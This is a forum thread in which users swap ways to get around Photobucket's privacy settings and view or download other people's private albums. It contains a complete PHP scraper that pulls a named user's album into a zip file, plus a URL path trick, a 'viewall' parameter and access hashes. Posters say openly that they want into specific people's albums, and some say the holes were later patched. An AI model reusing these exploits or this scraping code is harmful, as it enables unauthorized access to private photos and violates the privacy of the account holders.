Canti

Foto Bucket Bypass

228 posts in this topic

i figured out 2 things i thought would work, but instead of taking you to an error page it's just a blank page except with "photobucket.com"

could someone pm me and i can ask them if there's something other than these two? i checked around the internet afterwards and these two had been mentioned, but i don't know about any others.

edit: actually only one takes you to the error page. i think it's the single key address bar one someone mentioned earlier. the other takes you to the image page, but i think photobucket has fixed that.

Edited by DeadAsWarhol
0

Share this post


Link to post
Share on other sites

New version that dumps to a zip file.

Its a bit slow but works :)

Also hex is still removed sorry kids ;)



<?php

function hta($hex, $delimeter="%")
{
$hex = str_replace($delimeter, "", $hex);
$strLength = strlen($hex);
$returnVal = '';

for($i=0; $i<$strLength; $i += 2)
{
$dec_val = hexdec(substr($hex, $i, 2));
$returnVal .= chr($dec_val);
}
return $returnVal;
}

class zipfile
{

var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;

function add_dir($name)

{
$name = str_replace("\\", "/", $name);

$fr = "\x50\x4b\x03\x04";
$fr .= "\x0a\x00";
$fr .= "\x00\x00";
$fr .= "\x00\x00";
$fr .= "\x00\x00\x00\x00";

$fr .= pack("V",0);
$fr .= pack("V",0);
$fr .= pack("V",0);
$fr .= pack("v", strlen($name) );
$fr .= pack("v", 0 );
$fr .= $name;

$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);

$this -> datasec[] = $fr;

$new_offset = strlen(implode("", $this->datasec));

$cdrec = "\x50\x4b\x01\x02";
$cdrec .="\x00\x00";
$cdrec .="\x0a\x00";
$cdrec .="\x00\x00";
$cdrec .="\x00\x00";
$cdrec .="\x00\x00\x00\x00";
$cdrec .= pack("V",0);
$cdrec .= pack("V",0);
$cdrec .= pack("V",0);
$cdrec .= pack("v", strlen($name) );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$ext = "\x00\x00\x10\x00";
$ext = "\xff\xff\xff\xff";
$cdrec .= pack("V", 16 );

$cdrec .= pack("V", $this -> old_offset );
$this -> old_offset = $new_offset;

$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;


}


function add_file($data, $name)


{
$name = str_replace("\\", "/", $name);

$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= "\x00\x00\x00\x00";

$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$fr .= pack("v", strlen($name) );
$fr .= pack("v", 0 );
$fr .= $name;
$fr .= $zdata;
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);

$this -> datasec[] = $fr;

$new_offset = strlen(implode("", $this->datasec));

$cdrec = "\x50\x4b\x01\x02";
$cdrec .="\x00\x00";
$cdrec .="\x14\x00";
$cdrec .="\x00\x00";
$cdrec .="\x08\x00";
$cdrec .="\x00\x00\x00\x00";
$cdrec .= pack("V",$crc);
$cdrec .= pack("V",$c_len);
$cdrec .= pack("V",$unc_len);
$cdrec .= pack("v", strlen($name) );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("V", 32 );
$cdrec .= pack("V", $this -> old_offset );
$this -> old_offset = $new_offset;

$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}

function file() {
$data = implode("", $this -> datasec);
$ctrldir = implode("", $this -> ctrl_dir);

return
$data.
$ctrldir.
$this -> eof_ctrl_dir.
pack("v", sizeof($this -> ctrl_dir)).
pack("v", sizeof($this -> ctrl_dir)).
pack("V", strlen($ctrldir)).
pack("V", strlen($data)).
"\x00\x00";
}
}





$zipfile = new zipfile();

$zipfile -> add_dir($_GET['usr']."/");


$url = hta("HEX GOES HERE");
// Hex to prevent google from sharing it with the world.

$usr = $_GET['usr'];

$f = file_get_contents($url.$usr);

preg_match_all('/<DownloadURL>(.*?)<\/DownloadURL>/is', $f, $img);

$i = '0';

while($c != '1'){

if($img['1'][$i] != ''){

if(ereg(".album.xml", $img['1'][$i])){
}
else
{
$filedata = file_get_contents($img['1'][$i]);
$zipfile -> add_file($filedata, $_GET['usr']."/".$i.".gif");
}
$c = '0';

}

else{

$c = '1';

}

$i++;

}



header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=".$_GET['usr'].".zip");
echo $zipfile -> file();

?>

Edited by Canti
0

Share this post


Link to post
Share on other sites

what i think will be easier for noobs like me if u posted the hex and not the code lol

its too late for that... people already have the code copied, if he posted the hex it would be complete and people would spam it. thus eliminating its usefulnes, I say we also re-name the thread because I found this thread on google.

F0t0h Buhket byepass would be a better name for it.

0

Share this post


Link to post
Share on other sites

yeah all you will get now is

"<html><body>If you are attempting to use this script for legitimate purposes, please email us at <a href="mailto:userinfo@photobucket.com">userinfo@photobucket.com</a>.</body></html>"

0

Share this post


Link to post
Share on other sites

yeah all you will get now is

"<html><body>If you are attempting to use this script for legitimate purposes, please email us at <a href="mailto:userinfo@photobucket.com">userinfo@photobucket.com</a>.</body></html>"

It was fun while it lasted :)

Photobucket staff why would you shut us down? We didn't hurt any thing! We just like to rip content! Please oh please give it back!

Edited by Canti
0

Share this post


Link to post
Share on other sites

Was good while it lasted, but nothing lasts forever, esp. an exploit :P

0

Share this post


Link to post
Share on other sites

yeah damn looks like its BROKE! lol

good while it lasted

all this time me wanting to get into certain peoples photobucket, and when i actually i got it working, i forgot whos i wanted to get into lol

0

Share this post


Link to post
Share on other sites

trying to wrap my head around some other techniques now. anyone willing to shed light on cookies?

0

Share this post


Link to post
Share on other sites

trying to wrap my head around some other techniques now. anyone willing to shed light on cookies?

They taste good :)

0

Share this post


Link to post
Share on other sites

i'm pretty sure the filmloop trick still works buut you only get the first 50. no matter what they are. sucky sucky

0

Share this post


Link to post
Share on other sites

For a while I was having the same thing happen to me as the other guy where I could get read only mode with photobucket accounts, I managed to get it to work for about 2 weeks, but I guess they fixed it or I just stopped doing it right.

Can't win them all I suppose.

0

Share this post


Link to post
Share on other sites

lol 426be1b7985b72ec156299adebd25b77 keeps on working, pretty messed up

Its working for you? Good :)

it just stoped working, i guess it doesn't live on forever.

New one:

4deadcc9ee5a7c5ef3c15c6c6c507dd1

is this still a good hash? I tried using and got nowhere.

0

Share this post


Link to post
Share on other sites

i just posted a new thread, but it got closed by an admin. please reply.

:

I realize none of the public exploits work, and im sure some of you know of working ones but are hesitant to share , because clearly it will be fixed within a short period of time. but i was wondering if all of you could post all the past exploits that worked, so we can all compare and such, in hopes of a new one being discovered. thank you guys.

0

Share this post


Link to post
Share on other sites

http://i16.photobucket.com///albums/b28/dankchloe/

notice the two extra slashes. all you had to do was find out their account url which was just the image url with the filename taken off the end. simple as hell, too bad it got patched

that was working until this other script exploit described in this thread was patched

0

Share this post


Link to post
Share on other sites

Is google able to "see" any of the hidden images? I've seen on some sites that search engines can get through, but not anyone else...This is probably unlikely, but its worth a shot. If it could work..all you'd have to do is appear to be a google bot by switching your user agent (irongeek has a vid.)

Actually...since its so simple, it probably doesn't work :(

oh well

0

Share this post


Link to post
Share on other sites

http://i16.photobucket.com///albums/b28/dankchloe/

notice the two extra slashes. all you had to do was find out their account url which was just the image url with the filename taken off the end. simple as hell, too bad it got patched

that was working until this other script exploit described in this thread was patched

are u SERIOUS. that actually worked lol

0

Share this post


Link to post
Share on other sites
are u SERIOUS. that actually worked lol

Ya, that was a pretty good one. The best one was the original hack a couple years ago when all you needed to do was put, "?action=viewall" (or whatever it was) at the end and you'd see them all.

Photobucket is known for its 'brilliant' security measures.

Is google able to "see" any of the hidden images?

As far as I know, Google doesn't find the hidden images or index albums. It just pulls from sites and assembles the data..

If you go to http://images.google.com and put "kelly_68 site:photobucket.com" in as your search you'll see that it's not indexing the album, it's just posting links from various sites, in that case, Xanga. It's a nice thought though... ;)

The reason I quoted this, after, the "brilliant security measures" comment above is because you should NEVER overestimate Photobuckets security. Sometimes the easiest solution is good enough. ;)

0

Share this post


Link to post
Share on other sites

http://i16.photobucket.com///albums/b28/dankchloe/

notice the two extra slashes. all you had to do was find out their account url which was just the image url with the filename taken off the end. simple as hell, too bad it got patched

that was working until this other script exploit described in this thread was patched

are u SERIOUS. that actually worked lol

Yes it actually worked. I used it for about a day to view all the "banned" albums on photobucket. Someone on their forums told them about it and they patched it.

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now